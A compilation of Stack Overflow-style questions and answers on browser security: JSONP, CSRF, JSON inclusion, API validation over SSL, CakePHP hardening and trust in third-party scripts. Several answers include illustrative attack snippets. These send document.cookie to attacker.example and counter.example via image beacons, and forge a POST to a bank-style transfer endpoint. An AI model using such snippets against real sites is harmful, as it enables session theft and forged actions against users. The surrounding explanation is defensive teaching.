Safe implementation of script tag hack to do XSS?

Like a lot of developers, I want to make JavaScript served up by Server "A" talk to a web service on Server "B", but am stymied by the current incarnation of the same-origin policy. The most secure means of overcoming this (that I can find) is a server script that sits on Server "A" and acts as a proxy between it and "B". But if I want to deploy this JavaScript in a variety of customer environments (RoR, PHP, Python, .NET, etc.) and can't write proxy scripts for all of them, what do I do?
Use JSONP, some people say. Well, Doug Crockford pointed out on his website and in interviews that the script tag hack (used by JSONP) is an unsafe way to get around the same-origin policy. There's no way for the script being served by "A" to verify that "B" is who they say they are, and that the data it returns isn't malicious or won't capture sensitive user data on that page (e.g. credit card numbers) and transmit it to dastardly people. That seems like a reasonable concern, but what if I just use the script tag hack by itself and communicate strictly in JSON? Is that safe? If not, why not? Would it be any more safe with HTTPS? Example scenarios would be appreciated.
Addendum: Support for IE6 is required. Third-party browser extensions are not an option. Let's stick with addressing the merits and risks of the script tag hack, please.

Currently, browser vendors are split on how cross-domain JavaScript should work. A secure and easy-to-use option is Flash's crossdomain.xml file. Cross-domain proxies have been written for most languages, and they are open source.
A more nefarious solution would be to use XSS the way the Samy worm spread. XSS can be used to "read" a remote domain using XMLHttpRequest. XSS isn't even required if the other domain has added a <script src="https://YOUR_DOMAIN"></script>. A script tag like this allows you to evaluate your own JavaScript in the context of another domain, which is identical to XSS.
It is also important to note that even with the restrictions of the same-origin policy, you can get the browser to transmit requests to any domain; you just can't read the response. This is the basis of CSRF. You could write invisible image tags to the page dynamically to get the browser to fire off an unlimited number of GET requests. This use of image tags is how an attacker obtains document.cookie when exploiting XSS on another domain. CSRF POST exploits work by building a form and then calling .submit() on the form object.
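For illustration, a minimal sketch of both techniques (the domain names, paths and parameters are hypothetical placeholders):

    // 1. Fire a cross-domain GET (e.g. to exfiltrate document.cookie via
    //    XSS): the browser happily requests the image, and the attacker
    //    reads the cookie value out of his server's access logs.
    var img = new Image();
    img.src = "https://attacker.example/steal?c=" + encodeURIComponent(document.cookie);

    // 2. CSRF POST: build a hidden form targeting the victim site and
    //    submit it. The browser attaches the victim's cookies automatically.
    var form = document.createElement("form");
    form.method = "POST";
    form.action = "https://victim.example/account/transfer";
    var field = document.createElement("input");
    field.type = "hidden";
    field.name = "amount";
    field.value = "1000";
    form.appendChild(field);
    document.body.appendChild(form);
    form.submit();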
To understand the same-origin policy, CSRF and XSS better, you should read the Google Browser Security Handbook.

Take a look at easyXDM; it's a clean JavaScript library that allows you to communicate across the domain boundary without any server-side interaction. It even supports RPC out of the box.
It supports all 'modern' browsers, as well as IE6, with transit times < 15 ms.
A common use case is to expose an AJAX endpoint, allowing you to do cross-domain AJAX with little effort (check out the small sample on the front page).
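For reference, a minimal sketch loosely adapted from easyXDM's documented cross-domain AJAX example (the remote URL is a placeholder for wherever you host the library's bundled cors interface on the other domain):

    var rpc = new easyXDM.Rpc({
        // Provider page (easyXDM's bundled cors interface) on the remote
        // domain - placeholder URL:
        remote: "http://backend.example/easyxdm/cors/index.html"
    }, {
        remote: {
            request: {} // stub for the provider's exposed "request" method
        }
    });

    // Perform what looks like a normal AJAX call across the domain boundary:
    rpc.request({
        url: "/api/data.json",
        method: "GET"
    }, function (response) {
        alert(response.data); // body as returned by the remote server
    });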

What if I just use the script tag hack by itself and communicate strictly in JSON? Is that safe? If not, why not?
Let's say you have two servers - frontend.com and backend.com. frontend.com includes a <script> tag like this: <script src="http://backend.com/code.js"></script>.
When the browser evaluates code.js, it is considered a part of frontend.com and NOT a part of backend.com. So, if code.js contained XHR code to communicate with backend.com, it would fail.
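A minimal sketch of that failure (the URL is hypothetical):

    // Inside code.js - served from backend.com, but evaluated as part of
    // frontend.com. The same-origin check runs against frontend.com, so
    // this call back to backend.com is blocked:
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "http://backend.com/api/data", true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4) {
            // Cross-domain reads are refused; depending on the browser you
            // get an exception, or status 0 with an empty responseText.
            alert(xhr.status);
        }
    };
    xhr.send();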
Would it be any more safe with HTTPS? Example scenarios would be appreciated.
If you just converted your script tag to <script src="https://backend.com/code.js">, it would NOT be any more secure. If the rest of your page is http, then an attacker could easily man-in-the-middle the page and change that https to http - or worse, include his own JavaScript file.
If you convert the entire page and all its components to https, it would be more secure. But if you are paranoid enough to do that, you should also be paranoid enough NOT to depend on an external server for your data. If an attacker compromises backend.com, he has effectively got enough leverage over frontend.com, frontend2.com and all of your websites.
In short, https is helpful, but it won't help you one bit if your backend server gets compromised.
So, what are my options?
Add a proxy server on each of your client applications. You don't need to write any code; your web server can automatically do that for you. If you are using Apache, look up mod_rewrite. (A minimal proxy sketch follows the recommendation below.)
If your users are using the latest browsers, you could consider using Cross-Origin Resource Sharing (see the sketch after this list).
As The Rook pointed out, you could also use Flash + crossdomain. Or you could use Silverlight and its equivalent of crossdomain. Both technologies can communicate with JavaScript - so you just need to write a utility function, and then normal JS code would work. I believe YUI already provides a Flash wrapper for this - check out YUI3 IO.
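Regarding the CORS option above, a rough sketch of how it fits together (the header shown is the standard opt-in mechanism; hostnames are placeholders): the backend includes a response header such as Access-Control-Allow-Origin: http://frontend.com, and a CORS-capable browser then lets an ordinary XHR read the response.

    // On a page served from frontend.com. Works only if backend.com's
    // response carries: Access-Control-Allow-Origin: http://frontend.com
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "http://backend.com/api/data", true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
            alert(xhr.responseText); // readable, because backend.com opted in
        }
    };
    xhr.send();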
What do you recommend?
My recommendation is to create a proxy server, and use https throughout your website.
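To make the proxy option concrete, here is a minimal sketch in Node.js; any server-side stack (or Apache's mod_rewrite/mod_proxy) achieves the same effect. Hostnames, paths and the port are placeholders:

    // Same-origin proxy: the page calls /proxy/... on its own origin, and
    // this server forwards the request to backend.com and relays the reply.
    var http = require("http");

    http.createServer(function (clientReq, clientRes) {
        var proxyReq = http.request({
            hostname: "backend.com",
            path: clientReq.url.replace(/^\/proxy/, ""),
            method: clientReq.method,
            headers: { host: "backend.com" }
        }, function (proxyRes) {
            clientRes.writeHead(proxyRes.statusCode, proxyRes.headers);
            proxyRes.pipe(clientRes); // relay the response body
        });
        clientReq.pipe(proxyReq); // relay the request body, if any
    }).listen(8080);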

Apologies to all who attempted to answer my question. It proceeded under a false assumption about how the script tag hack works. The assumption was that one could simply append a script tag to the DOM and that the contents of that appended script tag would not be restricted by the same origin policy.
If I'd bothered to test my assumption before posting the question, I would've known that it's the src attribute of the appended tag that's unrestricted. JSONP takes this a step further by establishing a protocol that wraps traditional JSON web service responses in a callback function.
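For the record, a minimal sketch of that pattern (the endpoint and callback name are hypothetical):

    // The page defines a global callback, then appends a script tag whose
    // src points at the remote service; the src attribute is not subject
    // to the same-origin policy.
    function handleData(data) {
        alert(data.message);
    }

    var script = document.createElement("script");
    script.src = "http://backend.example/api/items?callback=handleData";
    document.getElementsByTagName("head")[0].appendChild(script);

    // The service replies with executable JavaScript rather than bare JSON:
    //
    //     handleData({"message": "hello"});
    //
    // which the browser runs as soon as it arrives - hence the risk:
    // whatever the server returns gets executed, sight unseen.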
Regardless of how the script tag hack is used, however, there is no way to screen the response for malicious code, since browsers execute whatever JavaScript is returned. And neither IE, Firefox nor WebKit browsers check SSL certificates in this scenario. Doug Crockford is, so far as I can tell, correct: there is no safe way to do cross-domain scripting as of JavaScript 1.8.5.

Related

CSRF protection in browser extensions

I need to implement CSRF protection for my site. I started implementing it for all forms on my site, but I have problems with implementing it in browser extensions (Chrome, Safari, Firefox). I have no idea how to do this for posts from my extensions (forms and AJAX posts). Has anyone ever implemented this?
Well, here are some things that I have seen people actually use, in my capacity as an addons.mozilla.org (code) reviewer:
Design a proper API. There are tons of resources on SO and the web detailing how to properly build RESTful APIs and secure them against CSRF. The thing to keep in mind is that extension APIs, in contrast to regular web pages, provide XHR that either doesn't enforce same-origin at all or lets you define a set of locations the extension is allowed to access. Hence extension-specific APIs need not implement CORS, which shrinks the attack surface of such APIs quite a bit. Of course, it would be better to go the extra mile and ensure your API is secure even with CORS.
Designing a full web API can take quite a lot of time. I have seen people build a very minimal one: the API consists of a single method to get the CSRF token, to be used with the regular, not-very-API-like existing forms.
If you cannot implement a proper API, because e.g. it's not your site/code, or you simply lack the time, resources and/or skills to learn about and then design and implement an API, there is still another way: just web-scrape the site (XHR + regex, usually) and get the CSRF token that way. Again, extensions do not have to abide by the same-origin policy, so web scraping is always a possibility, while websites cannot do the same thing unless allowed by CORS.
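A rough sketch of that scraping approach (the URL and the token field's markup are hypothetical):

    // Inside a browser extension, which is exempt from the same-origin
    // policy: fetch the page containing the form, pull the token out with
    // a regex, and use it for the subsequent POST.
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://example.com/settings", true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
            var match = /name="csrf_token"\s+value="([^"]+)"/.exec(xhr.responseText);
            if (match) {
                var token = match[1];
                // ...include token in the extension's form/AJAX posts...
                alert("Got CSRF token: " + token);
            }
        }
    };
    xhr.send();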
Almost forgot: Some extensions are nothing more than a button that will open a regular webpage on the server - not necessarily in a regular tab, but often in some kind of panel as provided by the extension API you're dealing with.

Is CSRF protection for side effect free GET requests needed?

I'm developing a web application in which all dynamic content is retrieved as JSON via AJAX requests. I'm considering whether I should protect GET API calls from being invoked from different origins.
GET requests do not modify state, and the common wisdom is that they do not require CSRF protection. But I wonder if there are corner cases in which the browser leaks the result of such requests to a different-origin site.
For example, if a different-origin site GETs /users/emails as a script, CSS or image, is it possible that the browser would leak the resulting JSON to the calling site (for example via a JavaScript onerror handler)?
Do browsers give strong enough guarantees that the content of a cross-origin JSON response won't be leaked? Do you think protecting GET requests against cross-origin calls makes sense, or is it overkill?
You have nailed a corner case and yet a highly relevant issue. Indeed, there is this possibility, and it's called JSON Inclusion, Cross-Site Script Inclusion, or JavaScript Inclusion, depending on whom you ask. The attack is, basically, doing a <script src="https://yoursite/users/emails"> on an evil site, and then accessing the results via JavaScript once the JS engine has parsed it.
The short story is that ALL your JSON responses have to be contained in an Object, not an Array or JSONP (so: {...}), and for good measure you should start all responses with a prefix (while(1);, for(;;); or a parser breaker). Look at Facebook's or Google's JSON responses for a live example.
Or, you can make your URLs unguessable by using CSRF protection - both approaches work.
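A sketch of the parser-breaker idea (the prefix and endpoint are illustrative): the server responds with while(1);{"emails": [...]}, so an evil page including the URL via a script tag just hangs or throws, while the legitimate same-origin client strips the prefix before parsing.

    // Legitimate same-origin client: fetch the raw text, strip the prefix,
    // then parse. (JSON.parse is native in modern browsers; older ones can
    // use json2.js.)
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/users/emails", true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
            var raw = xhr.responseText.replace(/^while\(1\);/, "");
            var data = JSON.parse(raw);
            alert(data.emails.length);
        }
    };
    xhr.send();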
No:
This is not a CSRF issue. As long as you're returning pure JSON and your GETs are side-effect free, it DOES NOT have to be CSRF-protected.
What Paradoxengine mentioned is another vulnerability: if you are using JSONP, it is possible for an attacker to read the JSON sent to an authenticated user. Users of very old browsers (IE 5.5) can also be attacked this way even with regular JSON.
You can send requests to a different domain (which is what CSRF attacks do), but you can't read the responses.
I learned this from another Stack Overflow question: It seems like I understand CSRF incorrectly?
Hope this helps you understand the question.

Security advice: SSL and API access

My API (a desktop application) communicates with my web app using basic HTTP authentication over SSL (Basically I'm just using https instead of http in the requests). My API has implemented logic that makes sure that users don't send incorrect information, but the problem I have is that someone could bypass the API and use curl to potentially post incorrect data (obtaining credentials is trivial since signing up on my web app is free).
I have thought about the following options:
Duplicate the API's logic in the web app so that even if users try to cheat the system using curl or some other tool they are presented with the same conditions.
Implement a further authentication check to make sure only my API can communicate with my web app. (Perhaps SSL client certificates?).
Encrypt the data (Base 64?)
I know I'm being a little paranoid about users spoofing my web app with curl-like tools but I'd rather be safe than sorry. Duplicating the logic is really painful and I would rather not do that. I don't know much about SSL client certificates, can I use them in conjunction with basic HTTP authentication? Will they make my requests take longer to process? What other options do I have?
Thanks in advance.
SSL protects you from man-in-the-middle attacks, but not from attacks originating on the client side of the SSL connection. A client certificate built into your client API would allow you to identify that data was crafted by the client-side API, but it will not help you figure out whether the client manually modified the data just before it got encrypted. A technically savvy user on the client end can always find a way to modify data by debugging through your client-side API. The best you can do is put roadblocks in your client-side API to make it harder to decipher. Validation on the server side is indeed the way to go.
Consider refactoring your validation code so that it can be used on both sides.
You must validate the data on the server side. You can throw nasty errors back across the connection if the server-side validation fails — that's OK, they're not supposed to be tripped — but if you don't, you are totally vulnerable. (Think about it this way: it's the server's logic that you totally control, therefore it is the server's logic that has to make the definitive decisions about the validity of communications.)
Using client certificates won't really protect you much additionally from users who have permission to use the API in the first place; if nothing else, they can take apart the code to extract the client certificate (and it has to be readable to your client code to be usable at all). Nor will adding extra encryption; it makes things much more difficult for you (more things to go wrong) without adding much safety over that already provided by that SSL connection. (The scenario where adding encryption helps is when the messages sent over HTTPS have to go via untrusted proxies.)
Base-64 is not encryption. It's just a way of encoding bytes as easier-to-handle characters.
I would agree in general with sinelaw's comment that such validations are usually better on the server side to avoid exactly the kind of issue you're running into (supporting multiple client types). That said, you may just not be in a position to move the logic, in which case you need to do something.
To me, your options are:
Client-side certificates, as you suggest -- you're basically authenticating that the client is who (or what, in your case) you expect it to be. I have worked with these before and mutual authentication configuration can be confusing. I would not worry about the performance, as I think the first step is getting the behavior you want (correctness first). Anyway, in general, while this option is feasible, it can be exasperating to set up, depending on your web container.
Custom HTTP header in your desktop app, checking for its existence/value on the server side, or just leveraging the existing User-Agent header. Since you're encrypting the traffic, no one should be able to easily see the HTTP header you're sending, so you can set its name and value to whatever you want. Checking for that on the server side is akin to assuring yourself that the client sending the request is almost certainly using your desktop app.
I would personally go the custom header route. It may not be 100% perfect, but if you're interested in doing the simplest possible thing to mitigate the most risk, it strikes me as the best route. It's not a great option if you don't use HTTPS (because then anyone can see the header if they flip on a sniffer), but given that you do use HTTPS, it should work fine.
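A rough sketch of the custom-header route, assuming a Node.js server on the receiving end; the header name, value and certificate file names are arbitrary placeholders:

    // The desktop app sends an agreed-upon header with every request, e.g.
    //
    //     X-My-Client: desktop-app-v1.2
    //
    // and the server rejects anything that lacks it.
    var https = require("https");
    var fs = require("fs");

    https.createServer({
        key: fs.readFileSync("server-key.pem"),
        cert: fs.readFileSync("server-cert.pem")
    }, function (req, res) {
        if (req.headers["x-my-client"] !== "desktop-app-v1.2") {
            res.writeHead(403);
            return res.end("Forbidden");
        }
        // ...normal handling - plus server-side validation! - goes here...
        res.writeHead(200);
        res.end("OK");
    }).listen(443);

Remember this only raises the bar: anyone who extracts the header from your app can still forge requests, which is why the server-side validation stays mandatory.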
BTW, I think you may be confusing a few things -- HTTPS is going to give you encryption, but it doesn't necessarily involve (client) authentication. Those are two different things, although they are often bundled together. I'm assuming you're using HTTPS with authentication of the actual user (basic auth or whatever).

CakePHP Security

I am new to the security of web apps. I am developing an application in CakePHP and one of my friends told me about cross-site request forgery (CSRF) and cross-site scripting (XSS) attacks, etc.; I'm not sure how many more there are.
I need some help in understanding how to make CakePHP defend my web app against these. We are on a low budget and we can't hire a security consultant as of now. We are still developing the app and plan to release it by the end of the month, so I want to take care of the initial things that can help us stay unhacked ;)
There is not (and cannot be) one tool you can deploy and then never have to think about security again. Deploying ‘anti-XSS’ hacks like CakePHP's Sanitize::clean will get in users' way by blocking valid input, whilst still not necessarily making the app secure. Input filtering hacks are at best an obfuscation measure, not a fix for security holes.
To have a secure web application, you must write a secure web application, from the ground up. That means, primarily, attention to detail when you are putting strings from one context into another. In particular:
any time you write a string into HTML text content or an attribute value, HTML-escape it (htmlspecialchars()) to avoid HTML injection leading to XSS. This isn't just a matter of user input that might contain attacks; it's the correct way to put plain text into HTML. (A client-side sketch of the same idea follows this list.)
Where you are using HTML helper methods, they should take care of HTML-escaping those elements by default (unless you turn off escape); it is very unfortunate that the CakePHP tutorial includes the bad practice of echoing unescaped strings into HTML for text outside of HTML helpers.
any time you create SQL queries with string values, SQL-escape them (with an appropriate function for your database, such as mysql_real_escape_string).
If you are using CakePHP's ORM and not writing your own SQL, you don't have to worry about this.
avoid using user input (e.g. file upload names) to name files on the filesystem (generate clean unique IDs instead) or as any part of a system() command.
include the Security component to add a form-submission token scheme that will prevent CSRF on forms generated by CakePHP.
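The same escaping discipline applies to any HTML you assemble in client-side JavaScript (htmlspecialchars() is the server-side counterpart); a minimal sketch, with a hypothetical target element:

    // Escape plain text before concatenating it into markup.
    function escapeHtml(text) {
        return String(text)
            .replace(/&/g, "&amp;")
            .replace(/</g, "&lt;")
            .replace(/>/g, "&gt;")
            .replace(/"/g, "&quot;");
    }

    // Example: user-controlled input (here, the URL fragment) rendered safely.
    var userName = decodeURIComponent(location.hash.slice(1));
    var element = document.getElementById("greeting"); // hypothetical element
    element.innerHTML = "Hello, <b>" + escapeHtml(userName) + "</b>!";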
Cake can be secured relatively easily (compared to self-written PHP scripts):
http://www.dereuromark.de/2010/10/05/cakephp-security/

"Same origin policy" and scripts loaded from google - a vulnerable solution?

I read the question "jQuery Linking vs. Download" here on SO and I somehow don't get it.
What happens if you host a page on http://yourserver.com, but load jQuery library from http://ajax.googleapis.com and then use the functions defined in jQuery script?
Does "same origin policy" not count in this case? I mean, can you make AJAX calls back to http://yourserver.com?
Is the JavaScript being executed considered as coming from yourserver.com?
My point here is: you do not know what the user has downloaded from some third-party server (sorry, Google), and yet the code executing on his computer is treated as if it were as good as the code he would download from your server?
EDIT: Does it mean that if I use a web statistics counter from a 3rd party I don't know very well, they might "inject" some code and call into my web services as if their code was part of mine?
The owner of site http://yourserver.com/ should trust the content it references from other servers (in this case, Google's). The same origin policy doesn't apply to "script" tags.
Of course, the scripts of the foreign servers (once loaded) have access to the whole DOM: so, if the foreign content is compromised, there can be security exposures.
As with many things in the web world, it comes down to trust and continuous management.
Edit:
Does it mean that if I use a web statistics counter from a 3rd party I don't know very well, they might "inject" some code and call into my web services as if their code was part of mine?
Yes.
Answering the Edit comment: Yes. Unless the counter was wrapped in an iframe tag, it is as if it were a part of your website, and it can call into your web services, access your cookies, etc.
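To make that risk concrete, a sketch of what an included third-party script could do (the URLs are hypothetical):

    // Anything inside a <script src="http://counter.example/stats.js">
    // include runs with the full authority of YOUR page. For instance:

    // 1. Read your users' cookies for your domain...
    var stolen = document.cookie;

    // 2. ...ship them elsewhere via an image beacon,
    new Image().src = "http://counter.example/log?c=" + encodeURIComponent(stolen);

    // 3. and call your web services as the logged-in user (same-origin,
    //    so the response is readable too).
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/api/private-data", true);
    xhr.send();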
Yes, the policy doesn't apply to <script> tags.
If someone was able to hack Google's script store, it would affect every page, served from any domain, that uses google.com as its script host.
